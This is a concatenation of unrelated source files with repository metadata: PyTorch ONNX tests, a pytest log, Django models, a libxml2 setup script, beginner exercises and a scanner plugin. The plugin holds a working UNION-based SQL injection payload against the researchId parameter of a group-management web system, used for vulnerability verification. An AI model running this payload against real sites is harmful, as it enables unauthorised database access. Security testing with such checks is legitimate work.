x = torch.ones(1, 3)
graph, _, __ = utils._model_to_graph(NarrowModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Slice"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_slice_index_exceeds_dim(self):
class SliceIndexExceedsDimModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = a[1:10] # index exceeds dimension
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(1, 3)
graph, _, __ = utils._model_to_graph(SliceIndexExceedsDimModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Slice"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_slice_negative_index(self):
class SliceNegativeIndexModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = a[0:-1] # index relative to the end
c = torch.select(a, dim=-1, index=-2)
d = torch.select(a, dim=1, index=0)
return b + x, c + d
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(1, 3)
graph, _, __ = utils._model_to_graph(SliceNegativeIndexModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Slice"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
def test_constant_fold_gather(self):
class GatherModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.select(a, dim=1, index=-2)
c = torch.index_select(a, dim=-2, index=torch.tensor([0, 1]))
return b + 1, c + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(1, 3)
model = GatherModule()
model(x)
graph, _, __ = utils._model_to_graph(GatherModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Gather"
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_unsqueeze(self):
class UnsqueezeModule(torch.nn.Module):
def forward(self, x):
a = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
b = torch.unsqueeze(a, 0)
return b + x
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(1, 2, 3)
graph, _, __ = utils._model_to_graph(UnsqueezeModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Unsqueeeze"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_concat(self):
class ConcatModule(torch.nn.Module):
def forward(self, x):
# Why did I insert a Cast here? There appears to be intentional
# behavior in ONNX constant folding where constant tensors which
# are not attached to any known to be foldable onnx
# operations don't get extracted into the initializer graph. So
# without these casts, we will actually fail to pull out one of
# the constants, thus failing constant folding. I think the
# test is wrong but I don't have time to write a more correct
# test (I think the right way to go about the test is to setup
# a predicate for what invariant graphs should hold after
# constant folding, and then verify this predicate holds.
# I think the asserts below are an attempt at this predicate,
# but it is not right!)
#
# More commentary at
# https://github.com/pytorch/pytorch/pull/18698/files#r340107552
a = torch.tensor([[1., 2., 3.]]).to(torch.float)
b = torch.tensor([[4., 5., 6.]]).to(torch.float)
c = torch.cat((a, b), 0)
d = b + c
return x + d
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.ones(2, 3)
graph, _, __ = utils._model_to_graph(ConcatModule(), (x, ),
do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Concat"
assert node.kind() != "onnx::Cast"
assert node.kind() != "onnx::Constant"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_lstm(self):
class GruNet(torch.nn.Module):
def __init__(self):
super(GruNet, self).__init__()
self.mygru = torch.nn.GRU(7, 3, 1, bidirectional=False)
def forward(self, input, initial_state):
return self.mygru(input, initial_state)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
input = torch.randn(5, 3, 7)
h0 = torch.randn(1, 3, 3)
graph, _, __ = utils._model_to_graph(GruNet(), (input, h0),
do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Slice"
assert node.kind() != "onnx::Concat"
assert node.kind() != "onnx::Unsqueeze"
assert len(list(graph.nodes())) == 3
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_transpose_matmul(self):
class MatMulNet(torch.nn.Module):
def __init__(self):
super(MatMulNet, self).__init__()
self.B = torch.nn.Parameter(torch.ones(5, 3))
def forward(self, A):
return torch.matmul(A, torch.transpose(self.B, -1, -2))
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
A = torch.randn(2, 3)
graph, _, __ = utils._model_to_graph(MatMulNet(), (A),
do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Transpose"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_reshape(self):
class ReshapeModule(torch.nn.Module):
def __init__(self, ):
super(ReshapeModule, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
b = self.weight.reshape(1, -1, 1, 1)
return x * b
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
x = torch.randn(4, 5)
graph, _, __ = utils._model_to_graph(ReshapeModule(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Reshape"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_div(self):
class Module(torch.nn.Module):
def __init__(self, ):
super(Module, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
div = self.weight.div(torch.tensor([1, 2, 3, 4, 5]))
return div * x
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, _, __ = utils._model_to_graph(Module(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Div"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_mul(self):
class Module(torch.nn.Module):
def __init__(self, ):
super(Module, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
mul = self.weight.mul(torch.tensor([1, 2, 3, 4, 5]))
return mul / x
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, _, __ = utils._model_to_graph(Module(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Mul"
assert len(list(graph.nodes())) == 1
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_add(self):
class Module(torch.nn.Module):
def __init__(self, ):
super(Module, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
add = self.weight + torch.tensor([1, 2, 3, 4, 5])
return add - x
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, params_dict, __ = utils._model_to_graph(
Module(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
self.assertTrue(node.kind() != "onnx::Add")
self.assertEqual(len(list(graph.nodes())), 1)
params = list(params_dict.values())
self.assertEqual(len(params), 1)
weight = params[0]
self.assertEqual(weight, torch.tensor([2, 3, 4, 5, 6]))
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_sub(self):
class Module(torch.nn.Module):
def __init__(self, ):
super(Module, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
sub = self.weight - torch.tensor([1, 2, 3, 4, 5])
return sub + x
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, params_dict, __ = utils._model_to_graph(
Module(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Sub"
self.assertEqual(len(list(graph.nodes())), 1)
params = list(params_dict.values())
self.assertEqual(len(params), 1)
weight = params[0]
self.assertEqual(weight, torch.tensor([0, -1, -2, -3, -4]))
# TODO : enable when constant folding is enabled for opset 12
@skipIfUnsupportedOpsetVersion([12])
def test_constant_fold_sqrt(self):
class Module(torch.nn.Module):
def __init__(self, ):
super(Module, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
sqrt = torch.sqrt(self.weight)
return sqrt / x
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, _, __ = utils._model_to_graph(Module(), (x, ), do_constant_folding=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Sqrt"
assert len(list(graph.nodes())) == 1
def test_constant_fold_shape(self):
class ShapeModule(torch.nn.Module):
def __init__(self):
super(ShapeModule, self).__init__()
self.register_buffer("weight", torch.ones(5))
def forward(self, x):
shape = self.weight.shape[0]
return x + shape
x = torch.randn(2, 5)
_set_opset_version(self.opset_version)
_set_operator_export_type(OperatorExportTypes.ONNX)
graph, _, __ = utils._model_to_graph(ShapeModule(), (x, ), do_constant_folding=True,
_disable_torch_constant_prop=True,
operator_export_type=OperatorExportTypes.ONNX)
for node in graph.nodes():
assert node.kind() != "onnx::Shape"
assert len(list(graph.nodes())) == 1
def test_strip_doc_string(self):
class MyModule(torch.nn.Module):
def forward(self, input):
return torch.exp(input)
x = torch.randn(3, 4)
def is_model_stripped(f, strip_doc_string=None):
if strip_doc_string is None:
torch.onnx.export(MyModule(), x, f, opset_version=self.opset_version)
else:
torch.onnx.export(MyModule(), x, f, strip_doc_string=strip_doc_string,
opset_version=self.opset_version)
model = onnx.load(io.BytesIO(f.getvalue()))
model_strip = copy.copy(model)
onnx.helper.strip_doc_string(model_strip)
return model == model_strip
# test strip_doc_string=True (default)
self.assertTrue(is_model_stripped(io.BytesIO()))
# test strip_doc_string=False
self.assertFalse(is_model_stripped(io.BytesIO(), False))
# NB: remove this test once DataParallel can be correctly handled
def test_error_on_data_parallel(self):
model = torch.nn.DataParallel(torch.nn.ReflectionPad2d((1, 2, 3, 4)))
x = torch.randn(1, 2, 3, 4)
f = io.BytesIO()
with self.assertRaisesRegex(ValueError,
'torch.nn.DataParallel is not supported by ONNX '
'exporter, please use \'attribute\' module to '
'unwrap model from torch.nn.DataParallel. Try '):
torch.onnx.export(model, x, f, opset_version=self.opset_version)
def test_export_mode(self):
class MyModule(torch.nn.Module):
def forward(self, x):
y = x + 1
return y
model = MyModule()
x = torch.randn(10, 3, 128, 128)
f = io.BytesIO()
# set mode to in inference mode and export in training mode
model.eval()
old_state = model.training
torch.onnx.export(model, (x,), f,
opset_version=self.opset_version, training=torch.onnx.TrainingMode.TRAINING)
# verify that the model state is preserved
assert model.training == old_state
# set mode to training mode and export in inference mode
model.train()
old_state = model.training
torch.onnx.export(model, (x,), f,
opset_version=self.opset_version, training=torch.onnx.TrainingMode.EVAL)
# verify that the model state is preserved
assert model.training == old_state
# TODO: Enable test when BatchNorm is implemented in ORT for opset 12.
@skipIfUnsupportedOpsetVersion([12])
def test_batchnorm_training(self):
class MyModule(torch.nn.Module):
def __init__(self):
super(MyModule, self).__init__()
self.bn = torch.nn.BatchNorm2d(3, affine=True)
def forward(self, x):
bn = self.bn(x)
return bn
model = MyModule()
x = torch.randn(10, 3, 128, 128)
model.train()
out = model(x)
# state after 1 train epoch
running_mean = model.bn.running_mean
running_var = model.bn.running_var
saved_mean = x.mean((0, 2, 3))
saved_var = x.var((0, 2, 3))
pytorch_out = [out.detach().numpy(),
running_mean.cpu().numpy(), running_var.cpu().numpy(),
saved_mean.cpu().numpy(), saved_var.cpu().numpy()]
model_export = MyModule()
f = io.BytesIO()
torch.onnx.export(model_export, (x,), f,
opset_version=self.opset_version, training=torch.onnx.TrainingMode.TRAINING)
ort_sess = onnxruntime.InferenceSession(f.getvalue())
ort_inputs = {ort_sess.get_inputs()[0].name : x.cpu().numpy()}
ort_outs = ort_sess.run(None, ort_inputs)
[np.testing.assert_allclose(p_out, ort_out, atol=10e-3, rtol=10e-3) for p_out, ort_out in zip(pytorch_out, ort_outs)]
# TODO: Enable test when Dropout is implemented in ORT for opset 12.
@skipIfUnsupportedOpsetVersion([12])
def test_dropout_training(self):
class MyModule(torch.nn.Module):
def __init__(self):
super(MyModule, self).__init__()
self.dropout = torch.nn.Dropout(0.4)
def forward(self, x):
dropout = self.dropout(x)
return dropout
model = MyModule()
x = torch.randn(10, 3, 128, 128)
model.train()
f = io.BytesIO()
torch.onnx.export(model, (x,), f,
opset_version=self.opset_version, training=torch.onnx.TrainingMode.TRAINING)
ort_sess = onnxruntime.InferenceSession(f.getvalue())
ort_inputs = {ort_sess.get_inputs()[0].name : x.cpu().numpy()}
ort_outs = ort_sess.run(None, ort_inputs)
assert x != ort_outs[0]
# Parameterize TestUtilityFuns over opset versions by cloning its __dict__
# into new TestCase subclasses that only differ in ``opset_version``.

# opset 10 tests
TestUtilityFuns_opset10 = type(str("TestUtilityFuns_opset10"),
                               (TestCase,),
                               dict(TestUtilityFuns.__dict__, opset_version=10))

# opset 11 tests
TestUtilityFuns_opset11 = type(str("TestUtilityFuns_opset11"),
                               (TestCase,),
                               dict(TestUtilityFuns.__dict__, opset_version=11))

# opset 12 tests
# BUG FIX: this class was defined twice back to back (the second copy,
# labelled "opset 12tests", rebound the same name to an identical class);
# keep a single definition.
TestUtilityFuns_opset12 = type(str("TestUtilityFuns_opset12"),
                               (TestCase,),
                               dict(TestUtilityFuns.__dict__, opset_version=12))

if __name__ == '__main__':
    run_tests()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
123fa1bf54e8b6e07efb17bac26e992b93729f39 | ff6248be9573caec94bea0fa2b1e4b6bf0aa682b | /output/StudentProblem/10.21.11.45/3/1569578443.py | 1753098b316b763fb20e3410fc4080977f4d3725 | [] | no_license | LennartElbe/codeEvo | 0e41b1a7705204e934ef71a5a28c047366c10f71 | e89b329bc9edd37d5d9986f07ca8a63d50686882 | refs/heads/master | 2020-12-21T17:28:25.150352 | 2020-03-26T10:22:35 | 2020-03-26T10:22:35 | 236,498,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 842 | py | ============================= test session starts ==============================
platform darwin -- Python 3.7.4, pytest-5.4.1, py-1.8.1, pluggy-0.13.1
rootdir: /tmp
collected 1 item
../../../../../tmp F [100%]
=================================== FAILURES ===================================
_____________________________________ test _____________________________________
def test():
"""tested leap funktion"""
assert leap(2004)
> assert leap(2001)
E assert False
E + where False = leap(2001)
/private/tmp/blabla.py:19: AssertionError
=========================== short test summary info ============================
FAILED ../../../../../tmp/::test - assert False
============================== 1 failed in 0.06s ===============================
| [
"lenni.elbe@gmail.com"
] | lenni.elbe@gmail.com |
9f47de70b04ccb57858ed871c067590152ce6840 | 9dd665b950ff86c82f3ea74b6c1216bc42c7c1df | /Programming-Basics/First_Steps_In_Coding/Square_Area.py | 7b867e465fb00630c6fb5ea314fe8df94b93902e | [] | no_license | toshhPOP/SoftUniCourses | 464c63a92e6594654a223cd764dc425f2990918b | b17021edd87d03b903567bf383ee71dce9a484cb | refs/heads/main | 2023-08-27T20:37:07.849185 | 2021-11-06T08:28:52 | 2021-11-06T08:28:52 | 394,772,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53 | py | side = int(input())
area = side * side
print(area )
| [
"toshopz26@gmail.com"
] | toshopz26@gmail.com |
e5220636500572d14722d578ed0d36e272a73c4c | d5125ccc1ef9915ffd72c575225a620aac5cb347 | /development/django_test_project/django_mysite/blog/models.py | dec8106056e3e47a4cc70ec40a2e11f392eae651 | [] | no_license | yurui829/stefanbo | 2231074e0e4f04438aff647563299ad1947bd760 | 449f862c81a3b4ae3e079ecb4a15b3a5cbcca701 | refs/heads/master | 2021-01-24T23:42:52.064783 | 2014-07-02T03:05:04 | 2014-07-02T03:05:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | from django.db import models
# import easy_thumbnail
from easy_thumbnails.fields import ThumbnailerImageField
############################################################
class BlogPost(models.Model):
    """A single blog entry: title, body text, and publication timestamp."""
    title = models.CharField(max_length=150)
    body = models.TextField()
    timestamp = models.DateTimeField()

    def __unicode__(self):
        # Consistency: Item and Photo in this module render as their
        # name/title in the Django admin; give BlogPost the same treatment.
        return self.title
#############################################################
class Item(models.Model):
    """A catalogue item; Photo rows point back at it via a ForeignKey."""
    # Display name, also the default sort key (see Meta.ordering).
    name = models.CharField(max_length=250)
    description = models.TextField()
    class Meta:
        # Querysets come back alphabetically by name unless overridden.
        ordering = ['name']
    def __unicode__(self):
        # Human-readable label used by the admin (Python 2 convention).
        return self.name
    @models.permalink
    def get_absolute_url(self):
        # Reverses the 'item_detail' URL pattern for this instance.
        return ('item_detail', None, {'object_id': self.id})
class Photo(models.Model):
    """An image attached to an Item; thumbnails come from easy-thumbnails."""
    item = models.ForeignKey(Item)
    title = models.CharField(max_length=100)
    # Uploads land under MEDIA_ROOT/photos; ThumbnailerImageField generates
    # resized variants on demand.
    image = ThumbnailerImageField(upload_to='photos', blank=True)
    caption = models.CharField(max_length=250, blank=True)
    def __unicode__(self):
        return self.title
    # NOTE(review): the disabled alternatives below (ordering by title and a
    # photo_detail permalink) look intentionally switched off -- confirm
    # before deleting or re-enabling them.
    #class Meta:
    #    ordering = ['title']
    #def __unicode__(self):
    #    return self.title
    #@models.permalink
    #def get_absolute_url(self):
    #    return ('photo_detail', None, {'object_id': self.id})
| [
"stefan_bo@163.com"
] | stefan_bo@163.com |
cce604d7c87324c908134270009a9e2f9e3e3505 | bd9a09a3f1a8b2b5166c540ada93cc5b30591605 | /scanner/plugins/cms/others/hnkj_researchinfo_dan_sqli.py | 45e7bf7e021770805dc12e1b41a3c2330a28bc57 | [
"MIT"
] | permissive | iceyhexman/onlinetools | 3cb6e349fc30c515f96429abeab5fbcc430ac0cc | 61f2df7ff8e6ad97ca7901728c3ab749679a2bd0 | refs/heads/master | 2023-08-06T19:31:51.328657 | 2022-10-28T04:01:38 | 2022-10-28T04:01:38 | 119,565,769 | 1,662 | 358 | MIT | 2023-03-31T14:34:13 | 2018-01-30T16:51:46 | Python | UTF-8 | Python | false | false | 1,064 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 汇能群管理系统SQL注入
referer: http://wooyun.org/bugs/wooyun-2010-0152664
author: Lucifer
description: 链接/main/model/childcatalog/researchinfo_dan.jsp?researchId=1中 researchID未过滤存在SQL注入漏洞
'''
import sys
import requests
class hnkj_researchinfo_dan_sqli_BaseVerify:
    """PoC check for the SQL injection in researchinfo_dan.jsp (researchId)."""

    def __init__(self, url):
        # Base URL of the target site, e.g. "http://host:port".
        self.url = url

    def run(self):
        """Probe the target; return a report string on hit or timeout.

        The payload UNION-selects MD5('1234') from H_System_User, so seeing
        the known digest 81dc9bdb... in the response proves the injected SQL
        executed. Returns None when the target responds without the marker.
        """
        payload = "/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27)),3%20from%20H_System_User--"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, timeout=10, verify=False)
        # BUG FIX: a bare "except:" also swallowed KeyboardInterrupt,
        # SystemExit and programming errors, reporting them all as a
        # timeout; only network/HTTP failures should be treated that way.
        except requests.exceptions.RequestException:
            return "[-]connect timeout"
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            return "[+]存在汇能群管理系统 SQL注入漏洞...(高危)\tpayload: "+vulnurl
if __name__ == "__main__":
testVuln = hnkj_researchinfo_dan_sqli_BaseVerify(sys.argv[1])
testVuln.run() | [
"834430486@qq.com"
] | 834430486@qq.com |
a34bf01cdd8b3293561d1ade7fa2babcf4b1d786 | 7034b7dec4a068493adde012e576891cb60c8d1e | /python/setup.py | f80a66c4f82ee2e5adb8436f2e19d3106f5beb50 | [
"MIT",
"LicenseRef-scancode-x11-xconsortium-veillard"
] | permissive | OpenCMISS-Dependencies/libxml2 | 4ed6741cfc7a9c89b03972422522203b28e6fc16 | 29930a028df0e92e6cec778f461194acc16d9c04 | refs/heads/v2.7.6 | 2022-05-02T03:33:26.421280 | 2022-04-26T21:26:34 | 2022-04-26T21:26:34 | 3,723,092 | 0 | 5 | NOASSERTION | 2021-04-19T21:25:51 | 2012-03-14T22:40:54 | C | UTF-8 | Python | false | false | 6,679 | py | #!/usr/bin/python -u
#
# Setup script for libxml2 and libxslt if found
#
import sys, os
from distutils.core import setup, Extension
# Below ROOT, we expect to find include, include/libxml2, lib and bin.
# On *nix, it is not needed (but should not harm),
# on Windows, it is set by configure.js.
ROOT = r'/usr'
# Thread-enabled libxml2
with_threads = 1
# If this flag is set (windows only),
# a private copy of the dlls are included in the package.
# If this flag is not set, the libxml2 and libxslt
# dlls must be found somewhere in the PATH at runtime.
WITHDLLS = 1 and sys.platform.startswith('win')
def missing(file):
    """Return 1 when *file* is not readable (or absent), else 0."""
    readable = os.access(file, os.R_OK)
    return 0 if readable else 1
try:
HOME = os.environ['HOME']
except:
HOME="C:"
if WITHDLLS:
# libxml dlls (expected in ROOT/bin)
dlls = [ 'iconv.dll','libxml2.dll','libxslt.dll','libexslt.dll' ]
dlls = map(lambda dll: os.path.join(ROOT,'bin',dll),dlls)
# create __init__.py for the libxmlmods package
if not os.path.exists("libxmlmods"):
os.mkdir("libxmlmods")
open("libxmlmods/__init__.py","w").close()
def altImport(s):
s = s.replace("import libxml2mod","from libxmlmods import libxml2mod")
s = s.replace("import libxsltmod","from libxmlmods import libxsltmod")
return s
if sys.platform.startswith('win'):
libraryPrefix = 'lib'
platformLibs = []
else:
libraryPrefix = ''
platformLibs = ["m","z"]
# those are examined to find
# - libxml2/libxml/tree.h
# - iconv.h
# - libxslt/xsltconfig.h
includes_dir = [
"/usr/include",
"/usr/local/include",
"/opt/include",
os.path.join(ROOT,'include'),
HOME
];
xml_includes=""
for dir in includes_dir:
if not missing(dir + "/libxml2/libxml/tree.h"):
xml_includes=dir + "/libxml2"
break;
if xml_includes == "":
print "failed to find headers for libxml2: update includes_dir"
sys.exit(1)
iconv_includes=""
for dir in includes_dir:
if not missing(dir + "/iconv.h"):
iconv_includes=dir
break;
if iconv_includes == "":
print "failed to find headers for libiconv: update includes_dir"
sys.exit(1)
# those are added in the linker search path for libraries
libdirs = [
os.path.join(ROOT,'lib'),
]
xml_files = ["libxml2-api.xml", "libxml2-python-api.xml",
"libxml.c", "libxml.py", "libxml_wrap.h", "types.c",
"xmlgenerator.py", "README", "TODO", "drv_libxml2.py"]
xslt_files = ["libxslt-api.xml", "libxslt-python-api.xml",
"libxslt.c", "libxsl.py", "libxslt_wrap.h",
"xsltgenerator.py"]
if missing("libxml2-py.c") or missing("libxml2.py"):
try:
try:
import xmlgenerator
except:
import generator
except:
print "failed to find and generate stubs for libxml2, aborting ..."
print sys.exc_type, sys.exc_value
sys.exit(1)
head = open("libxml.py", "r")
generated = open("libxml2class.py", "r")
result = open("libxml2.py", "w")
for line in head.readlines():
if WITHDLLS:
result.write(altImport(line))
else:
result.write(line)
for line in generated.readlines():
result.write(line)
head.close()
generated.close()
result.close()
with_xslt=0
if missing("libxslt-py.c") or missing("libxslt.py"):
if missing("xsltgenerator.py") or missing("libxslt-api.xml"):
print "libxslt stub generator not found, libxslt not built"
else:
try:
import xsltgenerator
except:
print "failed to generate stubs for libxslt, aborting ..."
print sys.exc_type, sys.exc_value
else:
head = open("libxsl.py", "r")
generated = open("libxsltclass.py", "r")
result = open("libxslt.py", "w")
for line in head.readlines():
if WITHDLLS:
result.write(altImport(line))
else:
result.write(line)
for line in generated.readlines():
result.write(line)
head.close()
generated.close()
result.close()
with_xslt=1
else:
with_xslt=1
if with_xslt == 1:
xslt_includes=""
for dir in includes_dir:
if not missing(dir + "/libxslt/xsltconfig.h"):
xslt_includes=dir + "/libxslt"
break;
if xslt_includes == "":
print "failed to find headers for libxslt: update includes_dir"
with_xslt = 0
descr = "libxml2 package"
modules = [ 'libxml2', 'drv_libxml2' ]
if WITHDLLS:
modules.append('libxmlmods.__init__')
c_files = ['libxml2-py.c', 'libxml.c', 'types.c' ]
includes= [xml_includes, iconv_includes]
libs = [libraryPrefix + "xml2"] + platformLibs
macros = []
if with_threads:
macros.append(('_REENTRANT','1'))
if with_xslt == 1:
descr = "libxml2 and libxslt package"
if not sys.platform.startswith('win'):
#
# We are gonna build 2 identical shared libs with merge initializing
# both libxml2mod and libxsltmod
#
c_files = c_files + ['libxslt-py.c', 'libxslt.c']
xslt_c_files = c_files
macros.append(('MERGED_MODULES', '1'))
else:
#
# On windows the MERGED_MODULE option is not needed
# (and does not work)
#
xslt_c_files = ['libxslt-py.c', 'libxslt.c', 'types.c']
libs.insert(0, libraryPrefix + 'exslt')
libs.insert(0, libraryPrefix + 'xslt')
includes.append(xslt_includes)
modules.append('libxslt')
extens=[Extension('libxml2mod', c_files, include_dirs=includes,
library_dirs=libdirs,
libraries=libs, define_macros=macros)]
if with_xslt == 1:
extens.append(Extension('libxsltmod', xslt_c_files, include_dirs=includes,
library_dirs=libdirs,
libraries=libs, define_macros=macros))
if missing("MANIFEST"):
manifest = open("MANIFEST", "w")
manifest.write("setup.py\n")
for file in xml_files:
manifest.write(file + "\n")
if with_xslt == 1:
for file in xslt_files:
manifest.write(file + "\n")
manifest.close()
if WITHDLLS:
ext_package = "libxmlmods"
if sys.version >= "2.2":
base = "lib/site-packages/"
else:
base = ""
data_files = [(base+"libxmlmods",dlls)]
else:
ext_package = None
data_files = []
setup (name = "libxml2-python",
# On *nix, the version number is created from setup.py.in
# On windows, it is set by configure.js
version = "2.7.6",
description = descr,
author = "Daniel Veillard",
author_email = "veillard@redhat.com",
url = "http://xmlsoft.org/python.html",
licence="MIT Licence",
py_modules=modules,
ext_modules=extens,
ext_package=ext_package,
data_files=data_files,
)
sys.exit(0)
| [
"h.sorby@auckland.ac.nz"
] | h.sorby@auckland.ac.nz |
af3fb2b3688a0e354caa5b88c3565eebf0664c0f | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project/.history/product_20211026231719.py | 291ef58343af0bae5fbd6dccf33cceea045d6ea9 | [] | no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 6,967 | py | import data as list_product
import random
# NOTE(review): this __init__ sits at MODULE level, not inside a class, so it
# is never invoked as a constructor; the rest of the module works on plain
# dicts. It also omits the Price and Quantity fields the dicts carry.
# Presumably a leftover from an abandoned Product class -- confirm before
# removing.
def __init__(self, Id, Product_code, Product_name, Brand, Year, Size):
    self.Id = Id
    self.Product_code = Product_code
    self.Product_name = Product_name
    self.Brand = Brand
    self.Year = Year
    self.Size = Size
# Add a product (interactive): prompts on stdin, appends a dict to
# data.list_product, and offers to repeat via a recursive self-call.
def AddProduct():
    print("THÊM SẢN PHẨM")
    # Products are plain dicts keyed by these fixed field names.
    product = {
        "Id": "",
        "Product_code": "",
        "Product_name": "",
        "Brand": "",
        "Price": "",
        "Year": "",
        "Quantity": "",
        "Size": ""
    }
    print("Nhập ID sản phẩm:")
    Id = int(input())
    # Re-prompt until the entered ID is not already in the product list.
    while True:
        student = FindProductDuplicate(Id)
        if student != False:
            print("ID đã tồn tại, vui lòng nhập lại ID:")
            Id = int(input())
        else:
            break
    product['Id'] = Id
    # Random product code: "HKSP" plus a zero-padded 2-digit number.
    code_product = random.randint(1, 99)
    str_id = "HKSP"
    if code_product <= 9:
        str_id += "0" + str(code_product)
    else:
        str_id += str(code_product)
    product["Product_code"] = str_id
    print("Nhập tên sản phẩm: ")
    product['Product_name'] = input()
    print("Nhập thương hiệu sản phẩm: ")
    product['Brand'] = input()
    print("Nhập giá sản phẩm: ")
    product['Price'] = float(input())
    print("Nhập năm sản xuất: ")
    product['Year'] = int(input())
    print("Nhập số lượng: ")
    product['Quantity'] = int(input())
